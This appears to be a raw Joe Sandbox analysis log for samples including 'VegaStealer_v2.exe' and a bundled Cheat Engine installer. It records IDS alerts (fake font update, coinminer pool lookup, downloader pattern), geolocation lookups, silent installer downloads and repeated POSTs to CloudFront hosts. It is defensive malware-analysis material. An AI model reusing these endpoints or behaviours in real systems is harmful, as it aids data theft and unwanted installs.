Source: C:\Windows\System32\conhost.exe	Directory created: C:\Program Files\Google\Libs
Source: C:\Windows\System32\cmd.exe	Directory created: C:\Program Files\Google\Libs\g.log

Source: unknown	HTTPS traffic detected: 172.67.160.84:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.226.4.166:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.226.4.166:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.226.4.166:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.226.4.166:443 -> 192.168.2.5:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.226.4.166:443 -> 192.168.2.5:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.226.4.166:443 -> 192.168.2.5:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.93:443 -> 192.168.2.5:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.93:443 -> 192.168.2.5:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.66.161.123:443 -> 192.168.2.5:49873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.93:443 -> 192.168.2.5:49887 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.165.135.3:443 -> 192.168.2.5:49896 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.93:443 -> 192.168.2.5:49903 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.165.135.3:443 -> 192.168.2.5:49911 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.66.161.123:443 -> 192.168.2.5:49920 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.165.135.3:443 -> 192.168.2.5:49921 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.9.108.93:443 -> 192.168.2.5:49943 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.165.135.3:443 -> 192.168.2.5:49951 version: TLS 1.2

Source:	Binary string: c:\dev\sqlite\dotnet-private\obj\2010\System.Data.SQLite.2010\Release\System.Data.SQLite.pdb source: v2.exe, v2.exe, 00000007.00000002.2187180994.0000000005992000.00000002.00000001.01000000.0000000C.sdmp, System.Data.SQLite.dll.5.dr
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: v2.exe, v2.exe, 00000007.00000002.2188423957.0000000005E32000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: v2.exe, 00000007.00000002.2163857464.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: :.pdbSH source: VegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Github\zbShield-Utils-CPP\zbShieldUtils\bin\Release\zbShieldUtils.pdb source: CheatEngine75.tmp, 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: c:\dev\sqlite\dotnet-private\obj\2010\System.Data.SQLite.Linq.2010\Release\System.Data.SQLite.Linq.pdb source: VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.Linq.dll.5.dr
Source:	Binary string: .pdbSHA2562$ source: VegaStealer_v2.exe, 00000005.00000003.2037815646.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .pdb` source: VegaStealer_v2.exe, 00000005.00000003.2013422206.0000000002C73000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: BouncyCastle.Crypto.pdbSHA256 source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2192854824.0000000007CA2000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: System.pdb source: v2.exe, 00000007.00000002.2163857464.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\dev\sqlite\dotnet-private\obj\2010\System.Data.SQLite.EF6.2010\Release\System.Data.SQLite.EF6.pdb source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Crypto.pdb source: VegaStealer_v2.exe, 00000005.00000003.2029473867.0000000003326000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rop.pdb source: VegaStealer_v2.exe, 00000005.00000003.2026508617.0000000002C74000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /_/artifacts/obj/EntityFramework.SqlServer/Release/net40/EntityFramework.SqlServer.pdb source: VegaStealer_v2.exe, 00000005.00000003.2037290562.000000000307C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\dev\sqlite\dotnet-private\bin\2010\Win32\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: /_/artifacts/obj/EntityFramework/Release/net40/EntityFramework.pdb source: VegaStealer_v2.exe, 00000005.00000003.2034886506.0000000003585000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /_/artifacts/obj/EntityFramework.SqlServer/Release/net40/EntityFramework.SqlServer.pdbSHA256$ source: VegaStealer_v2.exe, 00000005.00000003.2037290562.000000000307C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: pto.pdb source: VegaStealer_v2.exe, 00000005.00000003.2029473867.0000000003326000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .pdbSHA256 source: VegaStealer_v2.exe, 00000005.00000003.2038592762.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: BouncyCastle.Crypto.pdb source: v2.exe, v2.exe, 00000007.00000002.2192854824.0000000007CA2000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: /_/artifacts/obj/EntityFramework/Release/net40/EntityFramework.pdbSHA256 source: VegaStealer_v2.exe, 00000005.00000003.2034886506.0000000003585000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\dev\sqlite\dotnet-private\bin\2010\x64\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002DC6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: :.pdb source: VegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2188423957.0000000005E32000.00000002.00000001.01000000.0000000B.sdmp

Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Code function: 8_2_6B4E0F67 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,

8_2_6B4E0F67

Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	File opened: C:\Users\user\AppData\Local\Temp\is-3E079.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	File opened: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod0_extract	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\3.exe

Code function: 4x nop then push rbx

2_2_00007FF69AF15A66

Source: global traffic	HTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ReasonLabs-Setup-Wizard.exe?dui=9e146be9-c76a-4720-bcdb-53011b87bd06&dit=20241228162010&is_silent=true&oc=ZB_RAV_Cross_Tri_NCB&p=cdc2&a=100&b=&se=true&oip=26&ptl=7&dta=true&pds=%5bepp%2cvpn%2cdns%5d HTTP/1.1Host: shield.reasonsecurity.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/?fields=61439 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/?fields=61439 HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 104.21.85.189 104.21.85.189

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	DNS query: name: ip-api.com
Source: unknown	DNS query: name: ip-api.com

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 65.9.108.148:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 65.9.108.148:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 65.9.108.148:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49726 -> 65.9.108.148:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 13.226.4.166:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49766 -> 13.226.4.166:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49720 -> 13.226.4.166:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49749 -> 13.226.4.166:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49737 -> 13.226.4.166:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49778 -> 13.226.4.166:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49759 -> 65.9.108.148:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49793 -> 65.9.108.148:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49784 -> 65.9.108.148:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 65.9.108.148:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49743 -> 65.9.108.148:443
Source: Network traffic	Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.5:58867 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49772 -> 65.9.108.148:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49838 -> 65.9.108.93:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49849 -> 65.9.108.93:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49873 -> 18.66.161.123:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49891 -> 54.186.212.229:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49887 -> 65.9.108.93:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49900 -> 54.186.212.229:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49903 -> 65.9.108.93:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49913 -> 2.16.168.105:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49910 -> 2.16.168.105:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49896 -> 3.165.135.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49919 -> 65.9.108.93:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49911 -> 3.165.135.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49929 -> 2.16.168.105:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49921 -> 3.165.135.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49922 -> 54.186.212.229:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49936 -> 2.16.168.105:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49942 -> 2.16.168.105:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49951 -> 3.165.135.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49949 -> 2.16.168.115:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49943 -> 65.9.108.93:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49971 -> 54.186.212.229:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49964 -> 2.16.168.115:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49981 -> 2.16.168.115:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49957 -> 2.16.168.115:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50016 -> 104.20.94.94:443

Source: global traffic	HTTP traffic detected: POST /o HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 125Host: d34hwk9wxgk5fi.cloudfront.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 390Host: d31tu1fsc224h4.cloudfront.net
Source: global traffic	HTTP traffic detected: POST /zbd HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: /Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 409Host: d34hwk9wxgk5fi.cloudfront.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: /Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 464Host: d31tu1fsc224h4.cloudfront.net
Source: global traffic	HTTP traffic detected: POST /zbd HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: /Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 388Host: d34hwk9wxgk5fi.cloudfront.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: /Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 443Host: d31tu1fsc224h4.cloudfront.net
Source: global traffic	HTTP traffic detected: POST /zbd HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: /Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 419Host: d34hwk9wxgk5fi.cloudfront.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: /Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 474Host: d31tu1fsc224h4.cloudfront.net
Source: global traffic	HTTP traffic detected: POST /zbd HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: /Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 401Host: d34hwk9wxgk5fi.cloudfront.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: /Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 456Host: d31tu1fsc224h4.cloudfront.net
Source: global traffic	HTTP traffic detected: POST /zbd HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: /Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 418Host: d34hwk9wxgk5fi.cloudfront.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: /Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 473Host: d31tu1fsc224h4.cloudfront.net
Source: global traffic	HTTP traffic detected: POST /zbd HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: /Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 412Host: d34hwk9wxgk5fi.cloudfront.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: /Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 459Host: d31tu1fsc224h4.cloudfront.net
Source: global traffic	HTTP traffic detected: POST /zbd HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: /Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 400Host: d34hwk9wxgk5fi.cloudfront.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: /Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 447Host: d31tu1fsc224h4.cloudfront.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: /Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 457Host: d31tu1fsc224h4.cloudfront.net
Source: global traffic	HTTP traffic detected: POST /zbd HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: /Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 357Host: d34hwk9wxgk5fi.cloudfront.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: /Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 416Host: d31tu1fsc224h4.cloudfront.net
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Host: ip-api.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /f/WebAdvisor/images/943/EN.png HTTP/1.1Connection: Keep-AliveUser-Agent: Inno Setup 6.2.2Host: d34hwk9wxgk5fi.cloudfront.net
Source: global traffic	HTTP traffic detected: GET /f/WeatherZero/images/969/EN.png HTTP/1.1Connection: Keep-AliveUser-Agent: Inno Setup 6.2.2Host: d34hwk9wxgk5fi.cloudfront.net
Source: global traffic	HTTP traffic detected: GET /f/RAV_Triple_NCB/images/DOTPS-855/EN.png HTTP/1.1Connection: Keep-AliveUser-Agent: Inno Setup 6.2.2Host: d34hwk9wxgk5fi.cloudfront.net
Source: global traffic	HTTP traffic detected: GET /f/WebAdvisor/files/1489/saBSI.zip HTTP/1.1Connection: Keep-AliveUser-Agent: Inno Setup 6.2.2Host: d34hwk9wxgk5fi.cloudfront.net
Source: global traffic	HTTP traffic detected: GET /f/WeatherZero/files/969/WZSetup.zip HTTP/1.1Connection: Keep-AliveUser-Agent: Inno Setup 6.2.2Host: d34hwk9wxgk5fi.cloudfront.net
Source: global traffic	HTTP traffic detected: GET /rsStubActivator.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Inno Setup 6.2.2Host: shield.reasonsecurity.com
Source: global traffic	HTTP traffic detected: GET /ReasonLabs-Setup-Wizard.exe?dui=9e146be9-c76a-4720-bcdb-53011b87bd06&dit=20241228162010&is_silent=true&oc=ZB_RAV_Cross_Tri_NCB&p=cdc2&a=100&b=&se=true&oip=26&ptl=7&dta=true&pds=%5bepp%2cvpn%2cdns%5d HTTP/1.1Host: shield.reasonsecurity.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/?fields=61439 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/?fields=61439 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: freegeoip.app
Source: global traffic	DNS traffic detected: DNS query: ipbase.com
Source: global traffic	DNS traffic detected: DNS query: d34hwk9wxgk5fi.cloudfront.net
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: d31tu1fsc224h4.cloudfront.net
Source: global traffic	DNS traffic detected: DNS query: shield.reasonsecurity.com
Source: global traffic	DNS traffic detected: DNS query: electron-shell.reasonsecurity.com
Source: global traffic	DNS traffic detected: DNS query: api.openweathermap.org
Source: global traffic	DNS traffic detected: DNS query: cheatengine.org

Source: unknown

HTTP traffic detected: POST /o HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 125Host: d34hwk9wxgk5fi.cloudfront.net

Source: global traffic

